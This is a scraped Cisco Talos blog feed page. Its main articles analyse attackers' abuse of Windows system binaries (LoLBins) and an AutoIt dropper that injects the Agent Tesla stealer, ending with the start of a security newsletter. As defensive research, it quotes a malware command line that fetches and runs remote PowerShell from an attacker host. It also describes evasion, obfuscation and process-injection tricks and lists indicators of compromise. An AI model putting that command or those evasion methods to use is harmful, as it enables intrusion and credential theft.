Quantcast
Channel: Cisco Talos Blog
Viewing all 1927 articles
Browse latest View live

Hunting for LoLBins

$
0
0

By Vanja Svajcer.

Introduction

Attackers' trends tend to come and go. But one popular technique we're seeing at this time is the use of living-off-the-land binaries — or "LoLBins". LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases.

Living-off-the-land tactics mean that attackers are using pre-installed tools to carry out their work. This makes it more difficult for defenders to detect attacks and researchers to identify the attackers behind the campaign. In the attacks we're seeing, there are binaries supplied by the victim's operating system that are normally used for legitimate purposes, but in these cases, are being abused by the attackers.

In this post, we will take a look at the use of LOLBins through the lense of Cisco's product telemetry. We'll also walk through the most frequently abused Windows system binaries and measure their usage by analyzing data from Cisco AMP for Endpoints.

You'll also find an overview of a few recent campaigns we've seen using LoLBins, along with recommendations for how to detect malicious LoLBins' activities.

What are LoLBins

A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.

The concept of LoLBins is not new and isn't specific to Windows. Almost all conventional operating systems, starting from the early DOS versions and Unix systems, contained executables that attackers could exploit.

Here is an example from the mid 80s in which binary code to reboot the computer was supplied to the default debug.com DOS debugger as text, designed to avoid detection by anti-malware scanners and run malicious code as intended.

N SET.COM
A 100
MOV AX,0040
MOV DS,AX
MOV AX,1234
MOV [0072],AX
JMP F000:FFF0

RCX
10
W
Q
In their presentation at DerbyCon 3, Matthew Graeber and Christopher Campbell set the baseline for Windows, by discussing the advantages of using default Windows binaries to conduct red team activities and avoiding defensive mechanisms.

In this post, we also focus on Windows LoLBins and their usage today.

Overall, attackers can use LoLBins to:
  • Download and install malicious code
  • Executing malicious code
  • Bypassing UAC
  • Bypassing application control such as (WDAC)
Attackers may be able to target other utilities that are often pre-installed by system manufacturers and may be discovered during reconnaissance. These executables can be signed utilities such as updaters, configuration programs and various third party drivers.

The usage of LoLBins has been frequently combined with legitimate cloud services such as GitHub, Pastebin, Amazon S3 storage and cloud drives such as Dropbox, Box and Google Drive. By using legitimate cloud services for storage of malicious code, command and control (C2) infrastructure and data exfiltration attackers activities are more likely to remain undetected as the generated traffic does not differ from the traffic generated by systems that are not compromised.

Talos is mainly interested in finding executables that can be used to download or execute malicious code. In our research, we monitor daily execution patterns of the following executables to detect their abuse:
  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Abusing PowerShell


A primary suspect for malicious code download and in-memory execution in the recent period is PowerShell. Threat actors commonly use this command shell, which is built on the Windows management and .NET frameworks. This powerful administration environment has a security policy that can prevent the execution of untrusted code. Unfortunately, this policy can be easily circumvented with a single command line option.

One could argue that the execution of PowerShell with the option to bypass security policy should be outright blocked. However, there are a number of legitimate tools, such as Chocolatey package manager and some system management tools that use the exact command line.

PowerShell's code is not case-sensitive, and it will accept shortened versions of command-line options, as long as the option isn't ambiguous. For example -EncodedCommand option, which accepts a Base64-encoded string as a parameter can also be invoked as -EncodedC or even -enc, which is commonly used by malicious actors.

Popular malware like Sodinokibi and Gandcrab have used reflect DLL loaders in the past that allows attackers to load a dynamic library into process memory without using Windows API.

The Invoke-Obfuscation module is often used to create polymorphic obfuscated variants, which will not be detected by antivirus programs and other defensive mechanisms.

Over time, attackers have also realized the malicious potential of PowerShell, widening the number of executables used as LoLBins. Msbuild.exe and C# compiler csc.exe are some of the most frequently used by red teams. Both are frequently used to download, build and load malicious code that is built for that particular system and does not appear on any executable block list.

Measuring LoLBins usage

We analyzed telemetry provided from Cisco AMP for Endpoints to measure how often LoLBins are abused. The telemetry, sent over a secure channel, contains names of invoked processes and cryptographic checksums of their file images which helps us with tracking file trajectories and building parent-child process relationships that can be used for hunting.

An example of a process retrospection graph in AMP telemetry.

The telemetry data is focused on detecting new attacks as they happen but it should also allow us to measure how many potential LoLBin invocations are suspicious.

We looked at different LoLBins where the decision could be made quickly. In all cases, we're assuming the worst-case scenario and designated any invocation of the following processes with a URL as a parameter as suspicious:
  • mshta.exe
  • certutil.exe
  • bitsadmin.exe
  • regsvr32.exe
  • powershell.exe

Our relaxed definition of suspicious process invocation means that it will also have a significant false-positive rate. For example, for PowerShell invocations with a URL in the command line, we estimate that only 7 percent of the initially chosen calls should be checked in-depth and are likely to be malicious.

We obtain the percentage of suspicious calls by mining billions of daily data points and dividing the number of detected suspicious calls with the overall number of calls. Overall, our worst-case scenario shows that at least 99.8 percent of all LoLBins invocations are not worth further investigation.

LoLBins and percentages of suspect invocations.

We then distilled down these potentially suspicious calls to find the ones that are likely to be malicious.

Once again, we will take PowerShell. The worst figure for potentially suspicious PowerShell process executions was 0.2 percent. However, as mentioned before, only 7 percent of those actually require in-depth investigation, which brings the percentage down to 0.014 percent. Therefore, at least 99.986 percent of PowerShell invocations are legitimate.

A simple rule of thumb for URLs that can be used to pinpoint calls that are more likely to be malicious is to look for LoLBins invocation combined with:
  • External numeric IP address
  • Any .net TLD
  • Any .eu TLD
  • Any .ru TLD
  • Any URL ending with an executable or image extension (e.g. .EXE, .LNK, .DLL, .JPG, .PNG etc.)
  • Any reference to Pastebin.com and its clones
  • Any reference to Github or any other source code repository sites

Red teams' activities


Although the majority of recorded suspicious calls belong to malicious actors, it is worth noting that red-team activities are also visible. Here, security teams and penetration testers are often using adversarial simulation frameworks such as Red Canary Atomic tests to test the organizational defenses against tools, techniques and processes as classified in the ATT&CK knowledge base.

Some red team tools are tailored to mimic the activity of popular tools such as Mimikatz. Here is an example of a tailor-made script hosted on GitHub to emulate the adversarial technique of using a reputable domain to store malicious code.

Red team members using fake Mimikatz module to test defenses.

LoLBins actors' skill levels

In this section, we'll describe three individual campaigns, showing usage of PowerShell combined with memory-only code from three different actors with different skill sets. These campaigns can be relatively easily detected by internal hunting teams by analyzing command lines and their options.

Case 1: Common ransomware


The first case involves the Sodinokibi ransomware. Sodinokibi is a rather common ransomware that spreads by using standard methods like phishing and exploit kits, as well as exploiting vulnerabilities in web frameworks such as WebLogic.

We see from telemetry that PowerShell is launched with Invoke-Expression cmdlet evaluating code downloaded from a Pastebin web page using the Net.WebClient.DownloadString function, which downloads a web page as a string and stores it in memory.

Initial Sodinokibi PowerShell invocation.

The downloaded code is a reflective DLL loader with randomized function names to avoid simple pattern-based detection engines. The ransomware payload is Base64-encoded and stored in the variable $PEBytes32. It is worth noting that Base64 executable payloads can be instantly recognized by the initial two characters "TV," which get decoded into characters "MZ" for the start of DOS executable stub of a PE32+ executable file.

Reflective DLL loader loads Sodinokibi payload

Sodinokibi and Gandcrab are very common, but that does not mean that the actors behind them are not technically proficient. Although they use off-the-shelf techniques to spread and execute payloads, we can still estimate that they have an intermediate skill level.

Case 2: Intermediate miner

Our second actor used the PowerShell ability to obfuscate code and deobfuscate several layers of obfuscation in memory before reaching the actual PowerShell script that installs and launches a cryptocurrency-mining payload.

First invoke-obfuscation layer decoded

The Invoke-Obfuscation module is often used for PowerShell obfuscation. Apart from obfuscating the whole next layer script code, it also hides the invocation on Invoke-Expression (IEX) cmdlet. In this example, the $Env:COMSpec variable contains the string "C:\Windows\System\cmd.exe" so that joined fourth, 15th and 25th character form the string "iex."

This cryptocurrency miner had five deobfuscation stages and in the final one, the invocation of IEX was hidden by getting the name of the variable MaximumDriveCount using "gv" (Get-Variable cmdlet) with the parameter "*mdr*" and choosing characters 3, 11 and 2 to form it.

Extracting 'iex' from MaximumDriveCount

The downloaded PowerShell scripts contain the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.

Deobfuscated crypto-miner loader


Case 3: Hiding Cobalt Strike in network traffic


Our final case study shows the activities of a more advanced actor. The actor uses Cobalt Strike beacon for their post-exploitation activities with a PowerShell stager taken from the Cobalt Strike framework.

The telemetry shows this attack launched by abusing rundll32.exe and the command line invoking JScript code to download a web page and launch the initial PowerShell stager.

rundll32.exe javascript:\\..\\mshtml,RunHTMLApplication ;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://stjohnplece.co/lll/webax.js');

The first PowerShell stage, webax.js, despite misleading filename extension, decompresses the second-stage PowerShell code that loads the first shellcode stage into memory and creates a specific request to download what seems like a standard jQuery JavaScript library.

Cobalt Strike PowerShell stager

The shellcode creates an HTTP GET request to the IP address 134.209.176.24, but with header fields that indicate that the host we are looking for is code.jquery.com, the legitimate host serving jQuery. This technique seems to successfully bypass some automated execution environments which in their analysis results show that the request went to the legitimate host and not to the malicious IP address.

HTTP header with the spoofed host field

The downloaded malicious jQuery starts with the actual jQuery code in the first 4,015 bytes, followed by the obfuscated Cobalt Strike beacon, which gets deobfuscated with a static XOR key and loaded into memory using reflective loading techniques.


The beginning and the end of malicious jQuery and Cobalt Strike payload

The malicious jQuery ends with 1,520 bytes of the actual jQuery code, presumably to avoid anti-malware scanners scanning the request top and tail.

This technique of hiding binary payload within jQuery library and evasion of malicious IP address detection shows that we are dealing with a more advanced actor, which takes their operational security seriously.

Overall, we cannot pinpoint a single type of actor that focuses on using LoLBins. Although they may have been used only by more advanced actors, today they are also used by actors employing common malicious code such as ransomware or cryptominers.

Detecting and preventing LoLBins abuse

The protection against abuse of LoLBins combined with fileless code is difficult for security controls that do not monitor process behavior. The abuse can be detected based on the parent-child relationship of the launched processes as well as anomalies in network activity of processes that are not usually associated with network communication.

Organizations are advised to configure their systems for centralized logging where further analytics can be performed by hunting teams. Since version 5, PowerShell can also be configured to log execution of all executed code blocks to Windows event log. This allows members of security teams to understand obfuscated code which needs to be deobfuscated before it is run. The execution of the deobfuscated code will be visible in Windows event logs.

However, the best possible protection is to deny the execution of LoLBins using mechanisms such as Windows Defender Application Control. Microsoft created a policy block file, which will block the execution of LoLBins not required on protected systems.

Unfortunately, blocking all LoLBins is not possible in most environments since they are also required by legitimate processes.

Conclusion

Our research shows that many types of actors are employing various techniques to use LoLBins in their activities, from commodity malware to more targeted attacks. However, the overall proportion of malicious usage is very low (below 0.2 percent), which is not enough to block all invocations of LoLBins.

However, blue team members must keep LoLBins in mind while conducting regular hunting activities. If used successfully, an attacker can use these to make their attacks more difficult to trace or make their malware linger for longer on the victim machine.

Coverage

It is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

Additional ways our customers can detect and block these threats are listed below.



Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IoCs

Sodinokibi

dc3de6cff67f4bcb360d9fdd0fd5bd0d6afca0e1518171b8e364bb64c5446bb1
dc788044ba918463ddea34c1128c9f4da56e0778e582ae9abdeb15fdbcc57e80

Xmrig related

4528341b513fb216e06899a24d3560b89636158432ba7a0a118caa992739690e
c4ef0e90f81bac29899070d872e9ddea4531dbb5a18cdae090c19260cb0d4d83
e0ffda3353a17f5c9b7ef1d9c51f7dc1dcece1dfa2bcc8e1c93c27e5dde3b468
3f8d2e37a2bd83073e61ad4fc55536007076ae59a774b5d0c194a2bfab176172
92f0a4e2b7f4fe9d4ea373e63d9b08f4c2f21b2fd6532226c3fd576647efd64a
ebb7d224017d72d9f7462db541ac3dde38d2e7ecebfc9dca52b929373793590

Cobalt strike stager

522b99b5314531af6658e01ab471e1a7e0a5aa3a6ec100671dcfa0a6b0a1f52d
4c1a9ba633f739434cc81f23de9c6c1c12cdeacd985b96404a4c2bae2e54b0f5
f09d5ca3dfc53c1a6b61227646241847c5621b55f72ca9284f85abf5d0f06d35

Custom dropper hide and seek

$
0
0

Executive summary

Most users assume they are safe when surfing the web on a daily basis. But information-stealing malware can operate in the background of infected systems, looking to steal users' passwords, track their habits online and hijack personal information.

Cisco Talos has monitored adversaries which are behind a wave of ongoing campaigns dropping well-known information-stealer like Agent Tesla, Loki-bot and others since at least January 2019. The adversaries using custom droppers, which inject the final malware into common processes on the victim machine. Once infected, the malware can steal information from many popular pieces of software, including the Google Chrome, Safari and Firefox web browsers.

The injection techniques we're seeing in the wild are well-known and have been used for many years, but with the adversaries customizing them, traditional anti-virus systems are having a hard time detecting the embedded malware. In this post, we'll walk through one of these campaigns in detail and how the different stages of the dropper hide the malware. Any internet user is a potential target of this malware, and if infected, has the potential to completely take away a user's online privacy.


Technical overview

The campaigns we analyzed started with a malicious email similar to the one below:
Figure 1 - Phishing email

An ARJ archive is attached to this email. ARJ is an early 1990s archive format often used on the pirated software scene to convert files into archives. ARJ can split the archive into multiple smaller files. This made it easier to share these files over dial-up connections. ARJ archives can be unpacked with various tools like 7-Zip or WinRAR. Users can easily find an unpacker by double-clicking on the file and searching in the Windows Store for the appropriate software.

We often see that adversaries use old archive formats, hoping to bypass weak email security gateways. In this case, this archive wasn't split into multiple files and it contained only a single executable with the name: "IMP_Arrival Noticedoc.exe". This actor often used filenames with the schema "...<MS Office extension>.exe. In other campaigns by this adversary, we also saw completely different names and different file types like malicious office documents acting as first stage droppers. In this blog post, we will focus on the first ones.

Dropper

Most of the executables are compiled, sometimes UPX packed, AutoIt scripts that can be easily decompiled. Unfortunately, as usual, the content was heavily obfuscated before compilation. Figure 2 shows the decompiled version of the script.
Figure 2 - Decompiled version of the AutoIT script

The deobfuscated version of the AutoIT script in Figures 3 and 4 shows that it comes with some anti-VM checks in the beginning. These checks are very typical for AgentTesla campaigns for years, you can often find them in one or the other form in the first stage droppers.
Figure 3 - Start of the deobfuscated AutoIT script
Figure 4 - VM checks of the deobfuscated AutoIT script
If these checks do not find anything, it is decoding and extracting resource font type (8) names from the string in the first parameter ($data) handed over to the DecodeDataFromPEResourceOrString function (Figure 7). In the GetResourcesFromPE function (Figure 6), this parameter is converted into a string and split into the different font resource names. The result is a list of strings in the following order:
  1. SystemPropertiesDataExecutionPreventionM
  2. Windows.Media.BackgroundPlaybackK
  3. windeployL
  4. LaunchWinAppX
  5. ccaF
  6. CellularAPIQ
  7. MuiUnattendE
  8. RmClientE
  9. ucsvcG
  10. refsutilV
  11. SpeechRuntimeV
  12. DPTopologyAppv2_0N

These font type resources are then extracted from the PE resources and concatenated to a large binary.
Figure 5 - Resource Section of IMP_Arrival Noticedoc.exe
Figure 6 - GetResourcesFromPE Function

The result is stored again in the $data variable (Line 245 in Figure 7) and the order of the stored bytes is reversed by StringReverse(BinaryToString($data)) in Line 246. This is the final payload malware in an RC4 encrypted form. The variable $sopcode contains the bytes of the RC4 code. After preparing the shellcode and the encrypted payload data, the RC4 function is getting executed in line 262 and decrypts the payload.
Figure 7 - DecodeDataFromPEResourceOrString RC4 Function

The following pictures show the disassembled RC4 shellcode:
Figure 8 - RC4 function ($opcode variable)

After the payload is decrypted, the script calls the final InjectPayloadIntoProcess function to inject the payload into another process. It is offering nine different legit process options for this injection. The adversary eventually selects which one will be used by providing the corresponding number to the function.
Figure 9 - Injection victim process selection

In this case, the adversaries picked option one — RegAsm.exe — to hide the payload. The rest of the function is quite similar to what was already described in other blogs. It is preparing the local injection shellcode ($a5_local_shellcode) and executing it in Line 211 in Figure 10. As mentioned before, this code finally hides the payload inside of the selected legit process. The decoded payload is handed over to this injection shellcode as the last parameter ($a4_payload_code).
Figure 10 - Process Injection code of the AutoIT script

The AutoIT script contains several additional functions that are not used in this campaign. For example, functions for the following tasks:
  • Write a file to the TEMP directory and execute it.
  • Download a file from the internet and execute it.
  • Execute a script via the command line.
  • Privilege escalation.

The AutoIT scripts in the different campaigns are always very similar to the one described above. It usually just differs by how they built the payload. Some scripts extract the payload from the resource section as described above, others have the encrypted payload stored in a large string inside the AutoIT script (Figure 11). The decoding function shown in Figure 7 is more or less the same, but the $rt parameter is set to -1, which means the GetResourcesFromPE function (Figure 6) doesn't do anything, except returning the unmodified content of the $data variable, or in other words the content of the $payload variable in Figure 11.
Figure 11 - Long String based AutoIT script start

The Injection part of these scripts always work more or less the same, Figure 12 shows an example of another script.
Figure 12 - Long String based AutoIT script injection part

Payload

The injected payload is in many cases an obfuscated version of AgentTesla. The software is capable of stealing credentials from most browsers, email clients, SSH/SFTP/FTP clients and other software. Please see the IOC section below for additional details. It supports exfiltration via SMTP, FTP and HTTP exfiltration. In this case, it only used SMTP. This version is very similar to the one described by Yoroi in the payload section of their blog post, except it is not obfuscated with any obfuscator detected by the latest de4dot. Some functions are also slightly modified or reordered, but most of them are probably done by the obfuscator. We think it is close to the customized Agent Tesla version that's been circulating online since several months.
Figure 13 - AgentTesla

It is resolving configuration settings and suspicious strings at runtime when they are used. The function shown in Figure 10 is implemented in the executables static class constructor (.cctor). It is using the Rijndael algorithm to decrypt certain large arrays. The offset is picked based on the integer which was handed over to the function. On the right side of the screenshot, you can see the length of the array section in purple.
Figure 14 - Agent Tesla decoding routine

The next screenshot shows the usage at runtime. For example, decoding certain parameters for email exfiltration.
Figure 15 - Agent Tesla string obfuscation

The fully deobfuscated version of the function looks like this:
Figure 16 - Agent Tesla email function (deobfuscated)

This is the typical AgentTesla function used for years. It is interesting that it seems to be that the obfuscator is customized for this Agent Tesla version or vice versa. It looks like it is filling in variables at the time it is obfuscating the original code. In functions that are in this sample, but never used and even in a few used ones, some of the hardcoded strings are filled with variables e.g. %filename%.
Figure 17 - Obfuscator variables

Conclusion


This campaign is another example of what modern malware uses to fly under the radar. With the process we've described in this post, the actors can hide the original malware inside the dropper. The malware is only decrypted at runtime and injected into memory — it's never unencrypted on the hard drive. The adversaries use complex droppers that leverage several different obfuscation techniques to make it as hard as possible for antivirus programs to detect the malware. By using these droppers, they can quickly and easily change the final malware for their campaigns. Even known malware is often successfully hidden against anti-virus systems by using these kinds of obfuscation chains.

Coverage


Ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.


Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOC


Agent Tesla Stealer capabilities found based on decoded strings:
  1. 7Star Browser
  2. Amigo Browser
  3. Apple Keychain
  4. Becky! Internet Mail
  5. Brave Browser
  6. Centi Browser
  7. Chedot Browser
  8. Chrome Browser
  9. Chromium Browser
  10. Citrio Browser
  11. Claws Mail
  12. CocCoc Browser
  13. Comodo Dragon Browser
  14. CoolNovo Browser
  15. Coowon Browser
  16. CoreFTP
  17. Cyberfox Browser
  18. DynDNS client
  19. Elements Browser
  20. Epic Privacy Browser
  21. Eudora Mail
  22. Firefox Browser
  23. FlashFXP FTP client
  24. Flock Browser
  25. Foxmail
  26. FTPCommander
  27. FTPGetter
  28. FTP Navigator
  29. i360 Browser
  30. IceCat Browser
  31. IceDragon Browser
  32. IE/Edge Browser
  33. Incredimail
  34. Internet Download Manager
  35. Iridium Browser
  36. JDownloader
  37. Keylogger
  38. K-Meleon Browser
  39. Kometa Browser
  40. Liebao Browser
  41. Mozilla SeaMonkey
  42. Netgate BlackHawk Browser
  43. NoIP DNS client
  44. Open VPN
  45. Opera Browser
  46. Opera Mail
  47. Orbitum Browser
  48. Outlook
  49. Pale Moon Browser
  50. Paltalk Video Chat
  51. PassWd
  52. Pidgin
  53. PocoMail
  54. QIP Surf
  55. QQ Browser
  56. Safari Browser
  57. Screenshots
  58. Sleipnir 6 Browser
  59. SmartFTP
  60. Sputnik Browser
  61. SRWare Iron Browser
  62. TheBat! Email client
  63. Thunderbird
  64. Torch Browser
  65. Trillian
  66. UC Browser
  67. uCozMedia Uran
  68. Vivaldi Browser
  69. WaterFox Browser
  70. Wi-Fi Credentials and Profiles
  71. Windows Credentials
  72. Windows Domain Certificate Credential
  73. Windows Domain Password Credential
  74. Windows Extended Credential
  75. Windows Generic Credential
  76. Windows Secure Note
  77. Windows Web Password Credential
  78. WinSCP
  79. WS_FTP Pro FTP client
  80. Yandex Browser

Email:
Email: torre@casadavilas.com
Mailserver: mail.casadavilas.com

Malware moved to:
C:\Users\Dex Dexter\AppData\Local\Temp\tmpG766.tmp
[%TempPath% + "\tmpG" + DateTime.Now.Millisecond + ".tmp"]

Hashes executables:
d076ed9b31172c37a0d6bafae0c18d559f62453f52c17d41dc2e24fd55a91e4a
1c46332d2a0ab693ed1086f8ee78df47798361b4156619e2488cbb6851063373
003ee7d88f3a04cfc1b96744b060170d80da75589c67deaf65adb02d45616bb5
16f9a14d045fa28708710b5a089e1d1a361c8f5702a8574989b1935072c14a1d
4030b864bcff5bd617e3be273387eec3857b019d20b59c8f2f0710f1b1876ede
5246d87a5a69e7d50e7475bda5f9a74c3585188f0c937fcebebdf168043decd7
59880d4c59643d7b268082696931dcbe966780eef072f1150d1ac65dbc95d222
651c520971bc931dc3760b077a8ecd2fd3a7e4535afe2f0fd208168dc2a501e1
694dcad0105052b3b74678a9c0e4ad3c17e8a3e87314863751296d58aa263b23
a758516e200a5afb49ab2082c433fa59a8dbe2cf28973da6691a74759de479e1
b61a6d30e268a406f52aca04cc2a82853968f3516e38d2b5522e9fa5d4c0d3f5
e1954e26d6e82da6906441f30d133ad56b0154777128278d355365da475c4db4
F7303285a2039ab934b696fec43e54fc5c8ab5c6332c62a78891da71f3c2fb82

ARJ files:
667519d5fea7b6137de2845dc900cf2813c8fd8c8476b107fe9a281e7aa5248d
198dcc8511236212410e248d66c86236e1f23a79459a4c61aca5c8b913c9539c

Related hashes:
09dbe016c180e28b748f932805fc35170e348f3201d6939fc2b8368466c69315
10739410391018cedb2bdf6804c4506ea256695935afc34be786894e5cc80602
176d4d6ef5adb9655f63931914fe06688418d6ce62a3bbe6d6f09ccad53cca2f
4059c87e8d39f69e1fb3bc5d094af1dafca73e8b662eb8d6bb850bfb10d1e92e
421a642d23630ee480094dcb51f6ad6dc2430015d54cddbe0dbf299ee26869d4
51aa560a3709127d26dfb9289ec7d9b020558a0ad33b638bbddfaab6b180d7c3
61ee8edf4e9241ac3f5922547577e2c9b6a589b7402845be68c9e4bf377143b4
754fcf3ef2216f15750393c9ee580d1de9bb8b5834532183a7ef09a109b3990f
7a611fac9133845b29b73be71d1e08f2a82ee04a470b11bb0a25692da7c8caed
82ef16248078738591cc548e611a8ce22cb6b30db3ce123bd2900b0ddf644dba
94c3bbcf5af25417b755d9168cf6146b2de52658d8b909e0cdc38efde98df9fc
96bad87dae87cb2c73ce0e2f092dc68adc02a09cc2f549d1a4f390e42c41bf08
a2b174b1679d1a508c70acd2626e297c85aee3da5d50b5a0c7388960b6085c4a
a5ddd6719e9ced4f18289103a47bf39ad0e221fcac7ce00ed8e7180865b3c63a
aa295b39e3c9fbae2370bfc3bc03528a13fe5ee30d3497fff053fd4ab2ba790f
b7d790f4e11364d50c32a0a36fe7c9e159073c905fb4462c8d95e31ea608ede5
be7edfa65d420d6210b5e488b25ffe8a4fc1c37f9f358de97e0915d535766e74
d5cd5875253dbabb6548d96a290e73d196f6db250af8c3ec316d855ef7660f5a
da5d248dc77bd464c25fe5ad21ca62e58c69c4cc10cf27a13985432acfa6fd39
ddee0696d2062e1706c368c5066392d56e804c707d6923397cf66d56d2016773
de8fdea527ec9751531f15e727a7221103c5158bf14651faf19e648ec9652a0f
e480512a207fc9809035b273dd6c35fcd6caf8829ce5b9d81cc82f2d3b2d5394
e4b55be3eccbac57200e1c5e56d324afa23fdb8b12aba8d5be235b083b5afe0d
f05329ffcf221c72570e214a62fb8f04633c8d9e405a4278fd9360e738d9d779
f39c3cea5b1edcc71db1eb140b21f2aa56d9aee87c6d77528b84697aa9b19739
f6f35c3cbf83450d1fecb7101784e6cc89fa13b994ae16199087c2c5119984d3
fc2e81038c1cf19c40b9586889197446b426e8e4ed208931a616d838448fdd23
fc7cf41f41bb94253d946d5db29d65697464772af341e9a2bb20dffb943e716e
fe56eb80eb5b119b5c4e56811592029c4d8674061d4fbe89f8174cc4b403cfbf

URLs:
hxxp://premacorceb[.]com[/]drug[/]five[/]fre.php
hxxp://www[.]ibsensoftware[.]com/

IPs:
194[.]147[.]32[.]237
194[.]58[.]111[.]187


Threat Source newsletter (Nov. 14, 2019)

$
0
0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

It was all about the bugs this week. Patch Tuesday was especially busy for us, including our usual recap of all the vulnerabilities Microsoft's security update this month (two of which we discovered). On top of that, we also disclosed a remote code execution vulnerability in some Intel graphics drivers and another in Exhibitor’s web user interface.

We also recently discovered a wave of actors using living-off-the-land binaries to keep their malware from being detected. We run through how to detect these so-called “LoLBins,” and walk through some campaigns where we’ve seen them being used in the wild.

And, as always, we have our latest Threat Roundup with runs through the top threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “It’s Never DNS…. It Was DNS: How Adversaries Are Abusing Network Blind Spots”  at SecureWV/Hack3rCon X
Location: Charleston Coliseum & Convention Center, Charleston, WV
Date: Nov. 15 - 17
Speakers: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Event: “Reading Telegram messages abusing the shadows” at BSides Lisbon 
Location: Auditorio FMD-UL, Lisbon, Portugal
Date: Nov. 28 - 29
Speakers: Vitor Ventura
Synopsis: One of the cornerstones of privacy today is secure messaging applications like Telegram, which deploy end-to-end encryption to protect the communications. But several clone applications have been created and distributed with the intent of spying on their users. In this talk, Vitor will demonstrate how the Telegram registration process became abused, allowing message interception on non-rooted Android devices without replacing the official application. This is another example on how encryption is not a panacea, and that side-channel attacks like this are a real problem for otherwise secure applications.

Event: “Signed, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks” at CactusCon
Location: Charleston Coliseum & Convention Center, Charleston, WV
Date: Dec. 6 - 7
Speakers: Edmund Brumaghin and Earl Carter
Synopsis: This talk will discuss the common techniques we’re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future.

Cyber Security Week in Review

  • Microsoft says it will honor new privacy protections offered in a California law across the entire U.S. Under the California Consumer Privacy Act, companies must inform users of what personal data they’re collecting, if that data is being sold and to whom, and users can opt out of any sales.  
  • Adobe patched three critical vulnerabilities as part of its monthly security update, including two in Adobe Media Encoder. There were also eight other bugs disclosed that Adobe considered “important.” 
  • Intel’s Cascade Lake line of CPUs are vulnerable to the Zombieload v2 exploit. The company released a security update this week to address these issues, but the evolution in the attack proves it can target more recent hardware. 
  • Google reportedly has collected health care data on millions of Americans without their knowledge. The tech giant works with Ascencion health care to to amass records across 21 states in an initiative codenamed “Project Nightengale.” 
  • Britain’s Labour political party was hit with two cyber attacks this week, both distributed denial-of-service campaigns. Labour officials say they have not confirmed there was any data breach. 
  • Mexican company Petroleos Mexicanos says it will have to switch to manual billing after a ransomware attack. The company, known as “Pemex,” says its employees still cannot access their emails or internet more than 24 hours later. 
  • Facebook is expanding its efforts to crack down on spam messages on its platform, shortly after its sister company Instagram did the same. However, attackers have still been successful at compromising accounts, and then using those accounts to purchase thousands of dollars in ad space. 
  • The U.S. Federal Trade Commission is suing a Utah-based company for failing to detect a data breach for more than 22 months. The infection didn’t become apparent until the targeted company ran out of hard drive space, which was actually stuffed with the attacker’s data archive.  
  • A new app promises to alert users if their iPhone has been hacked. The software is designed to scan for the “side effects” commonly caused by iPhone hacks and jailbreaks. 
  • The well-known APT33 hacking group from Iran has established its own VPN and has at least 22 nodes operating. The group is perhaps most well-known for developing the Shamoon disk-wiping malware. 

Notable recent security issues

Title: Microsoft disclosed 13 critical bugs as part of monthly security update
Description: Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 75 vulnerabilities, 13 of which are considered "critical," with the rest being deemed "important." This month’s security update covers security issues in a variety of Microsoft services and software, including the Scripting Engine, the Windows Hyper-V hypervisor, and Win32. Cisco Talos discovered one of these vulnerabilities, CVE-2019-1448 —a remote code execution vulnerability in Microsoft Excel. 
Snort SIDs: 46548, 46549, 52205 - 52209, 52212, 52213, 52216, 52217 - 52225, 52228 - 52234, 52239, 52240

  

Title: LEADTOOLS toolkit contains several vulnerabilities, including remote code execution 
